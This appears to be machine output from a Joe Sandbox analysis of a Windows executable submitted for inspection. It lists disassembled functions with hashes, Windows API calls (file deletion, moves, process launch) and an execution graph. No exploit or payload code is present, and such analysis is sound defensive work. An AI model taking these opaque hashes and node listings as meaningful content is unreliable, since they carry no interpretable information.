                    • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                    • Instruction ID: 7c1bb2ccc3b92dbaf17dce2da81fd940d9d11f2b1cdeb77d2e1e2293d970ce37
                    • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                    • Instruction Fuzzy Hash: 70512562F187C14AE729DF359842369AB95EB80B91F88D232C69C87BD6CF7CD444C712
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                    • String ID: SIZE
                    • API String ID: 449872665-3243624926
                    • Opcode ID: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                    • Instruction ID: ffccf91a071f7b42abe1e836dbd6bc24155ebc6240ddb4dc0b3042b671c0705e
                    • Opcode Fuzzy Hash: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                    • Instruction Fuzzy Hash: E941D772E2864285EF14EB14E4423BDE350EF957A0F904233FA9E426D5EEBCE541C751
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FileModuleName_invalid_parameter_noinfo
                    • String ID: C:\Users\user\Desktop\KR6CT3hIxT.exe
                    • API String ID: 3307058713-1167482243
                    • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                    • Instruction ID: cdb5cb4d115a2be8baa837614d78e3aa7e0c73cd0bf8e383feebf0e9fe74e740
                    • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                    • Instruction Fuzzy Hash: 4441B536E08A5285E718EF21A8423BCB794EF447D5BC58037E94E87B45DEBDE541C322
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Item$Text$Dialog
                    • String ID: ASKNEXTVOL
                    • API String ID: 2638039312-3402441367
                    • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                    • Instruction ID: 6a4d37c20f4b6a7b0134cedd625774eb0c20e1d146a5cfd4be90bb21ca9af63d
                    • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                    • Instruction Fuzzy Hash: 2941A122F0864281EB14FB15E4523BAA3A0BF86BC5F940137EE4E07795CEBDE4458362
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide_snwprintf
                    • String ID: $%s$@%s
                    • API String ID: 2650857296-834177443
                    • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                    • Instruction ID: 82d4eaf64b201a23777515305fe3df26d966a429092c1e9ef1354ddcfad51859
                    • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                    • Instruction Fuzzy Hash: 1131E272B19A4685EF14EF26E4423E9A3A0FB44784F801037EE4E17799EE7CE506C791
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FileHandleType
                    • String ID: @
                    • API String ID: 3000768030-2766056989
                    • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                    • Instruction ID: 0b9affaea6f44c70b12840dd2a3aa20b3704e7dc719be61e743c943cafd53e92
                    • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                    • Instruction Fuzzy Hash: 9D21E522E08A9240EF68DB249491238B659EB45775FA84337D66F477D4CFBCD881C372
                    APIs
                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E1DE1D3E), ref: 00007FF7E1DE40BC
                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E1DE1D3E), ref: 00007FF7E1DE4102
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ExceptionFileHeaderRaise
                    • String ID: csm
                    • API String ID: 2573137834-1018135373
                    • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                    • Instruction ID: 72b8a1de1f13aae0820d4ba2a73cd95ffa61bc4f0908016b226f376bda28c687
                    • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                    • Instruction Fuzzy Hash: 32114F32A08B8182EB25DF15E440269BBE1FB88B94F588232EF8D47768DF7CD565C701
                    APIs
                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA63
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA6E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorLastObjectSingleWait
                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                    • API String ID: 1211598281-2248577382
                    • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                    • Instruction ID: 027bd721f9e1daf279f1e8d9761d5f568871db61bcbe594021abfb1f4ae077e7
                    • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                    • Instruction Fuzzy Hash: 04E0E561E1984291E700F7249C43ABDA2117FA8760FD44332E03E811E59EBCAAA9C223
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FindHandleModuleResource
                    • String ID: RTL
                    • API String ID: 3537982541-834975271
                    • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                    • Instruction ID: e30934c32e1ed61768c9c4bb56e56e2c19264b7ced6ec8983ebf864599598ea2
                    • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                    • Instruction Fuzzy Hash: 2ED01251F0960141FF19A761944637492505B1CB41F84413AC80E06354EEBC91E4C766

                    Execution Graph

                    Execution Coverage:9.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:2.7%
                    Total number of Nodes:1570
                    Total number of Limit Nodes:39
                    execution_graph 24080 b610b5 24085 b6644d 24080->24085 24084 b610c4 24086 b66457 __EH_prolog 24085->24086 24094 b6c9d8 GetCurrentProcess GetProcessAffinityMask 24086->24094 24088 b66464 24095 b704e5 41 API calls __EH_prolog 24088->24095 24090 b664bb 24096 b6665c GetCurrentProcess GetProcessAffinityMask 24090->24096 24092 b610ba 24093 b80372 29 API calls 24092->24093 24093->24084 24094->24088 24095->24090 24096->24092 26170 b7c7b0 101 API calls 24157 b8bdb0 24159 b8bdbb 24157->24159 24160 b8bde4 24159->24160 24161 b8bde0 24159->24161 24163 b8c0ca 24159->24163 24170 b8be10 DeleteCriticalSection 24160->24170 24171 b8be58 24163->24171 24166 b8c10f InitializeCriticalSectionAndSpinCount 24167 b8c0fa 24166->24167 24178 b80d7c 24167->24178 24169 b8c126 24169->24159 24170->24161 24172 b8be84 24171->24172 24173 b8be88 24171->24173 24172->24173 24177 b8bea8 24172->24177 24185 b8bef4 24172->24185 24173->24166 24173->24167 24175 b8beb4 GetProcAddress 24176 b8bec4 _abort 24175->24176 24176->24173 24177->24173 24177->24175 24179 b80d84 24178->24179 24180 b80d85 IsProcessorFeaturePresent 24178->24180 24179->24169 24182 b80dc7 24180->24182 24192 b80d8a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24182->24192 24184 b80eaa 24184->24169 24186 b8bf15 LoadLibraryExW 24185->24186 24189 b8bf0a 24185->24189 24187 b8bf4a 24186->24187 24188 b8bf32 GetLastError 24186->24188 24187->24189 24190 b8bf61 FreeLibrary 24187->24190 24188->24187 24191 b8bf3d LoadLibraryExW 24188->24191 24189->24172 24190->24189 24191->24187 24192->24184 26172 b80f0f 9 API calls 2 library calls 24200 b7f5a5 24201 b7f54e 24200->24201 24201->24200 24202 b7f9e9 ___delayLoadHelper2@8 14 API calls 24201->24202 24202->24201 26091 b7a4a0 GetClientRect 26092 b8d0a0 GetCommandLineA GetCommandLineW 26122 b7d8d8 107 API calls 4 library calls 26123 b7f5af 14 API calls ___delayLoadHelper2@8 26095 b7b090 28 API calls 26124 b8b590 21 API calls 2 library calls 26153 b83a90 6 API calls 4 library calls 26174 b80790 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24239 b7de9d 24240 b7df67 24239->24240 24246 b7dec0 24239->24246 24255 b7d8d8 _wcslen _wcsrchr 24240->24255 24267 b7e8df 24240->24267 24243 b7e54f 24245 b73316 CompareStringW 24245->24246 24246->24240 24246->24245 24247 b7dbac SetWindowTextW 24247->24255 24252 b7d99a SetFileAttributesW 24254 b7da54 GetFileAttributesW 24252->24254 24265 b7d9b4 __cftof _wcslen 24252->24265 24254->24255 24257 b7da66 DeleteFileW 24254->24257 24255->24243 24255->24247 24255->24252 24258 b7dd76 GetDlgItem SetWindowTextW SendMessageW 24255->24258 24261 b7ddb6 SendMessageW 24255->24261 24266 b73316 CompareStringW 24255->24266 24291 b7c504 24255->24291 24295 b7b65d GetCurrentDirectoryW 24255->24295 24300 b6b9ca 6 API calls 24255->24300 24301 b6b953 FindClose 24255->24301 24302 b7c67e 76 API calls 2 library calls 24255->24302 24303 b8521e 24255->24303 24257->24255 24259 b7da77 24257->24259 24258->24255 24297 b64a20 24259->24297 24261->24255 24263 b7daac MoveFileW 24263->24255 24264 b7dac4 MoveFileExW 24263->24264 24264->24255 24265->24254 24265->24255 24296 b6cdc0 51 API calls 2 library calls 24265->24296 24266->24255 24270 b7e8e9 __cftof _wcslen 24267->24270 24268 b7eb37 24268->24255 24269 b7e9f5 24316 b6b4c1 24269->24316 24270->24268 24270->24269 24271 b7eb10 24270->24271 24319 b73316 CompareStringW 24270->24319 24271->24268 24275 b7eb2e ShowWindow 24271->24275 24275->24268 24276 b7ea29 ShellExecuteExW 24276->24268 24283 b7ea3c 24276->24283 24278 b7ea21 24278->24276 24279 b7ea75 24321 b7ed8b 6 API calls 24279->24321 24280 b7eacb CloseHandle 24281 b7ead9 24280->24281 24282 b7eae4 24280->24282 24322 b73316 CompareStringW 24281->24322 24282->24271 24283->24279 24283->24280 24285 b7ea6b ShowWindow 24283->24285 24285->24279 24287 b7ea8d 24287->24280 24288 b7eaa0 GetExitCodeProcess 24287->24288 24288->24280 24289 b7eab3 24288->24289 24289->24280 24292 b7c50e 24291->24292 24293 b7c5e0 ExpandEnvironmentStringsW 24292->24293 24294 b7c5fd 24292->24294 24293->24294 24294->24255 24295->24255 24296->24265 24337 b649f3 24297->24337 24300->24255 24301->24255 24302->24255 24304 b8a6a4 24303->24304 24305 b8a6bc 24304->24305 24306 b8a6b1 24304->24306 24308 b8a6c4 24305->24308 24314 b8a6cd _abort 24305->24314 24416 b8a7fe 24306->24416 24311 b8a66a _free 20 API calls 24308->24311 24309 b8a6d2 24423 b8a7eb 20 API calls _abort 24309->24423 24310 b8a6f7 HeapReAlloc 24313 b8a6b9 24310->24313 24310->24314 24311->24313 24313->24255 24314->24309 24314->24310 24424 b88e5c 7 API calls 2 library calls 24314->24424 24323 b6b4d3 24316->24323 24319->24269 24320 b6cad4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24320->24278 24321->24287 24322->24282 24331 b7ffd0 24323->24331 24326 b6b4f1 24333 b6cf32 24326->24333 24327 b6b4ca 24327->24276 24327->24320 24329 b6b505 24329->24327 24330 b6b509 GetFileAttributesW 24329->24330 24330->24327 24332 b6b4e0 GetFileAttributesW 24331->24332 24332->24326 24332->24327 24334 b6cf3f _wcslen 24333->24334 24335 b6cfe7 GetCurrentDirectoryW 24334->24335 24336 b6cf68 _wcslen 24334->24336 24335->24336 24336->24329 24338 b64a0a __vswprintf_c_l 24337->24338 24341 b872e2 24338->24341 24344 b853a5 24341->24344 24345 b853cd 24344->24345 24346 b853e5 24344->24346 24361 b8a7eb 20 API calls _abort 24345->24361 24346->24345 24348 b853ed 24346->24348 24363 b85944 24348->24363 24349 b853d2 24362 b851b9 26 API calls _abort 24349->24362 24353 b80d7c CatchGuardHandler 5 API calls 24355 b64a14 GetFileAttributesW 24353->24355 24355->24259 24355->24263 24356 b85475 24372 b85cf4 51 API calls 3 library calls 24356->24372 24359 b853dd 24359->24353 24360 b85480 24373 b859c7 20 API calls _free 24360->24373 24361->24349 24362->24359 24364 b85961 24363->24364 24365 b853fd 24363->24365 24364->24365 24374 b8a515 GetLastError 24364->24374 24371 b8590f 20 API calls 2 library calls 24365->24371 24367 b85982 24394 b8aaf6 38 API calls __fassign 24367->24394 24369 b8599b 24395 b8ab23 38 API calls __fassign 24369->24395 24371->24356 24372->24360 24373->24359 24375 b8a52b 24374->24375 24376 b8a531 24374->24376 24396 b8c01b 11 API calls 2 library calls 24375->24396 24380 b8a580 SetLastError 24376->24380 24397 b8c2f6 24376->24397 24380->24367 24381 b8a54b 24404 b8a66a 24381->24404 24384 b8a560 24384->24381 24386 b8a567 24384->24386 24385 b8a551 24387 b8a58c SetLastError 24385->24387 24411 b8a380 20 API calls _abort 24386->24411 24412 b8a0f4 38 API calls _abort 24387->24412 24389 b8a572 24391 b8a66a _free 20 API calls 24389->24391 24393 b8a579 24391->24393 24393->24380 24393->24387 24394->24369 24395->24365 24396->24376 24402 b8c303 _abort 24397->24402 24398 b8c343 24414 b8a7eb 20 API calls _abort 24398->24414 24399 b8c32e RtlAllocateHeap 24400 b8a543 24399->24400 24399->24402 24400->24381 24410 b8c071 11 API calls 2 library calls 24400->24410 24402->24398 24402->24399 24413 b88e5c 7 API calls 2 library calls 24402->24413 24405 b8a675 RtlFreeHeap 24404->24405 24409 b8a69e _free 24404->24409 24406 b8a68a 24405->24406 24405->24409 24415 b8a7eb 20 API calls _abort 24406->24415 24408 b8a690 GetLastError 24408->24409 24409->24385 24410->24384 24411->24389 24413->24402 24414->24400 24415->24408 24417 b8a83c 24416->24417 24421 b8a80c _abort 24416->24421 24426 b8a7eb 20 API calls _abort 24417->24426 24418 b8a827 RtlAllocateHeap 24420 b8a83a 24418->24420 24418->24421 24420->24313 24421->24417 24421->24418 24425 b88e5c 7 API calls 2 library calls 24421->24425 24423->24313 24424->24314 24425->24421 24426->24420 26155 b83e8b 38 API calls 4 library calls 26097 b78880 132 API calls 26126 b81180 RaiseException _com_raise_error _com_error::_com_error 25041 b7f6f5 25042 b7f6a3 25041->25042 25043 b7f9e9 ___delayLoadHelper2@8 14 API calls 25042->25043 25043->25042 26156 b7c2f3 78 API calls 26127 b7edf1 DialogBoxParamW 25047 b8ccf0 25048 b8ccf9 25047->25048 25049 b8cd02 25047->25049 25051 b8cbe7 25048->25051 25052 b8a515 _abort 38 API calls 25051->25052 25053 b8cbf4 25052->25053 25071 b8cd0e 25053->25071 25055 b8cbfc 25080 b8c97b 25055->25080 25058 b8cc13 25058->25049 25059 b8a7fe __vsnwprintf_l 21 API calls 25060 b8cc24 25059->25060 25061 b8cc56 25060->25061 25087 b8cdb0 25060->25087 25064 b8a66a _free 20 API calls 25061->25064 25064->25058 25065 b8cc51 25097 b8a7eb 20 API calls _abort 25065->25097 25067 b8cc9a 25067->25061 25098 b8c851 26 API calls 25067->25098 25068 b8cc6e 25068->25067 25069 b8a66a _free 20 API calls 25068->25069 25069->25067 25072 b8cd1a ___scrt_is_nonwritable_in_current_image 25071->25072 25073 b8a515 _abort 38 API calls 25072->25073 25078 b8cd24 25073->25078 25075 b8cda8 _abort 25075->25055 25078->25075 25079 b8a66a _free 20 API calls 25078->25079 25099 b8a0f4 38 API calls _abort 25078->25099 25100 b8bdf1 EnterCriticalSection 25078->25100 25101 b8cd9f LeaveCriticalSection _abort 25078->25101 25079->25078 25081 b85944 __fassign 38 API calls 25080->25081 25082 b8c98d 25081->25082 25083 b8c99c GetOEMCP 25082->25083 25084 b8c9ae 25082->25084 25086 b8c9c5 25083->25086 25085 b8c9b3 GetACP 25084->25085 25084->25086 25085->25086 25086->25058 25086->25059 25088 b8c97b 40 API calls 25087->25088 25089 b8cdcf 25088->25089 25092 b8ce20 IsValidCodePage 25089->25092 25094 b8cdd6 25089->25094 25096 b8ce45 __cftof 25089->25096 25090 b80d7c CatchGuardHandler 5 API calls 25091 b8cc49 25090->25091 25091->25065 25091->25068 25093 b8ce32 GetCPInfo 25092->25093 25092->25094 25093->25094 25093->25096 25094->25090 25102 b8ca53 GetCPInfo 25096->25102 25097->25061 25098->25061 25100->25078 25101->25078 25103 b8cb37 25102->25103 25107 b8ca8d 25102->25107 25106 b80d7c CatchGuardHandler 5 API calls 25103->25106 25109 b8cbe3 25106->25109 25112 b8db48 25107->25112 25109->25094 25111 b8bd38 __vsnwprintf_l 43 API calls 25111->25103 25113 b85944 __fassign 38 API calls 25112->25113 25114 b8db68 MultiByteToWideChar 25113->25114 25116 b8dc3e 25114->25116 25117 b8dba6 25114->25117 25118 b80d7c CatchGuardHandler 5 API calls 25116->25118 25120 b8dbc7 __cftof __vsnwprintf_l 25117->25120 25121 b8a7fe __vsnwprintf_l 21 API calls 25117->25121 25122 b8caee 25118->25122 25119 b8dc38 25131 b8bd83 20 API calls _free 25119->25131 25120->25119 25124 b8dc0c MultiByteToWideChar 25120->25124 25121->25120 25126 b8bd38 25122->25126 25124->25119 25125 b8dc28 GetStringTypeW 25124->25125 25125->25119 25127 b85944 __fassign 38 API calls 25126->25127 25128 b8bd4b 25127->25128 25132 b8bb1b 25128->25132 25131->25116 25133 b8bb36 __vsnwprintf_l 25132->25133 25134 b8bb5c MultiByteToWideChar 25133->25134 25135 b8bd10 25134->25135 25136 b8bb86 25134->25136 25137 b80d7c CatchGuardHandler 5 API calls 25135->25137 25141 b8a7fe __vsnwprintf_l 21 API calls 25136->25141 25142 b8bba7 __vsnwprintf_l 25136->25142 25138 b8bd23 25137->25138 25138->25111 25139 b8bc5c 25168 b8bd83 20 API calls _free 25139->25168 25140 b8bbf0 MultiByteToWideChar 25140->25139 25143 b8bc09 25140->25143 25141->25142 25142->25139 25142->25140 25159 b8c12c 25143->25159 25147 b8bc6b 25149 b8a7fe __vsnwprintf_l 21 API calls 25147->25149 25153 b8bc8c __vsnwprintf_l 25147->25153 25148 b8bc33 25148->25139 25151 b8c12c __vsnwprintf_l 11 API calls 25148->25151 25149->25153 25150 b8bd01 25167 b8bd83 20 API calls _free 25150->25167 25151->25139 25153->25150 25154 b8c12c __vsnwprintf_l 11 API calls 25153->25154 25155 b8bce0 25154->25155 25155->25150 25156 b8bcef WideCharToMultiByte 25155->25156 25156->25150 25157 b8bd2f 25156->25157 25169 b8bd83 20 API calls _free 25157->25169 25160 b8be58 _abort 5 API calls 25159->25160 25161 b8c153 25160->25161 25164 b8c15c 25161->25164 25170 b8c1b4 10 API calls 3 library calls 25161->25170 25163 b8c19c LCMapStringW 25163->25164 25165 b80d7c CatchGuardHandler 5 API calls 25164->25165 25166 b8bc20 25165->25166 25166->25139 25166->25147 25166->25148 25167->25139 25168->25135 25169->25139 25170->25163 26099 b810f0 LocalFree 26128 b8d1f0 GetProcessHeap 25174 b613fd 43 API calls 2 library calls 26130 b7bde0 73 API calls 26131 b905e1 21 API calls __vsnwprintf_l 26176 b873e0 QueryPerformanceFrequency QueryPerformanceCounter 26157 b8c66e 27 API calls CatchGuardHandler 25183 b6acd4 25184 b6acde 25183->25184 25185 b6ae2c SetFilePointer 25184->25185 25188 b6ae05 25184->25188 25189 b6acf4 25184->25189 25190 b6aa7a 25184->25190 25186 b6ae49 GetLastError 25185->25186 25185->25189 25186->25189 25188->25185 25191 b6aa93 25190->25191 25193 b6b110 79 API calls 25191->25193 25192 b6aac5 25192->25188 25193->25192 25195 b7c9d0 25196 b7c9da __EH_prolog 25195->25196 25369 b612f6 25196->25369 25199 b7d10b 25444 b7e7ee 25199->25444 25200 b7ca1a 25202 b7ca8b 25200->25202 25203 b7ca28 25200->25203 25277 b7ca31 25200->25277 25209 b7cb1e GetDlgItemTextW 25202->25209 25213 b7caa1 25202->25213 25205 b7ca2c 25203->25205 25206 b7ca68 25203->25206 25215 b6f937 53 API calls 25205->25215 25205->25277 25216 b7cb4f KiUserCallbackDispatcher 25206->25216 25206->25277 25207 b7d126 SendMessageW 25208 b7d134 25207->25208 25211 b7d14e GetDlgItem SendMessageW 25208->25211 25212 b7d13d SendDlgItemMessageW 25208->25212 25209->25206 25210 b7cb5b 25209->25210 25218 b7cb70 GetDlgItem 25210->25218 25367 b7cb64 25210->25367 25462 b7b65d GetCurrentDirectoryW 25211->25462 25212->25211 25214 b6f937 53 API calls 25213->25214 25221 b7cabe SetDlgItemTextW 25214->25221 25222 b7ca4b 25215->25222 25216->25277 25219 b7cba7 SetFocus 25218->25219 25220 b7cb84 SendMessageW SendMessageW 25218->25220 25224 b7cbb7 25219->25224 25239 b7cbc3 25219->25239 25220->25219 25225 b7cac9 25221->25225 25484 b6122f SHGetMalloc 25222->25484 25223 b7d17e GetDlgItem 25227 b7d1a1 SetWindowTextW 25223->25227 25228 b7d19b 25223->25228 25230 b6f937 53 API calls 25224->25230 25234 b7cad6 GetMessageW 25225->25234 25225->25277 25463 b7bbc0 GetClassNameW 25227->25463 25228->25227 25235 b7cbc1 25230->25235 25231 b7d051 25232 b6f937 53 API calls 25231->25232 25236 b7d061 SetDlgItemTextW 25232->25236 25238 b7caed IsDialogMessageW 25234->25238 25234->25277 25379 b7e619 25235->25379 25241 b7d075 25236->25241 25238->25225 25243 b7cafc TranslateMessage DispatchMessageW 25238->25243 25246 b6f937 53 API calls 25239->25246 25240 b7d3f8 SetDlgItemTextW 25240->25277 25247 b6f937 53 API calls 25241->25247 25243->25225 25245 b7cc1d 25250 b7cc51 25245->25250 25254 b6b4c1 3 API calls 